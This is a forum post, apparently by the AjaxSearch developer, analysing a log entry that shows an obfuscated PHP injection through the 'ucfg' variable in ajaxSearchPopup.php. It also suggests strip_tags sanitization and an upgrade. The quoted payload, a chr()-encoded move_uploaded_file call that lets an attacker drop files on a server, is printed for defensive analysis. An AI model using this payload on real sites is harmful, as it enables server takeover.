@goldsky
I found this:
[3-Aug-10 12:07:05] AjaxSearchPopup - Snippet call : [!AjaxSearch? &version=`<?php move_uploaded_file($_FILES[chr(117).chr(115).chr(101).chr(114).chr(102).chr(105).chr(108).chr(101)][chr(116) . chr(109) . chr(112) . chr(95) . chr(110) . chr(97) . chr(109) . chr(101)], $_REQUEST[chr(112) . chr(97) . chr(116) . chr(104)]);?>` &debug=`1` &mbstring=``!]
This trace (when debug=1) is written by the release 1.8.4 (or 1.8.5) when the ajax mode is used (The results are displayed in a popup window).
The snippet call is provided to the ajaxSearchPopup.php file thru a $_POST[’ucfg’] variable.
I don’t why (And I am very interesting to understand how it is possible), but it seems that a hack could change the value of this ucfg variable. Variable which is sent to thru an ajax request (see ajaxSearch.js), and add the above move_uploaded_file instruction.
If this instruction contribute to this iframe exploit (which is not really proved), we could avoid this, by sanitize this variable.
For instance in the file ajaxSearchPopup.php replace the line:
by:
$ucfg = strip_tags($_POST['ucfg']);
This is for the release 1.8.3 to 1.8.5. with ajax mode.
AjaxSearch 1.9 has been completely refactored, so It is not sure that this possible exploit is still possible.
Nevertheless, in the ajaxSearch 1.9.1 the sanitization of all the external variables have been improved. You could download the last release from the repository or from the demo site from
this page.
The correct name of the ajaxSearch package is ajaxSearch191_7249. 7249 is the lower svn id of the repository.
☆ A M B ☆
☆ A M B ☆
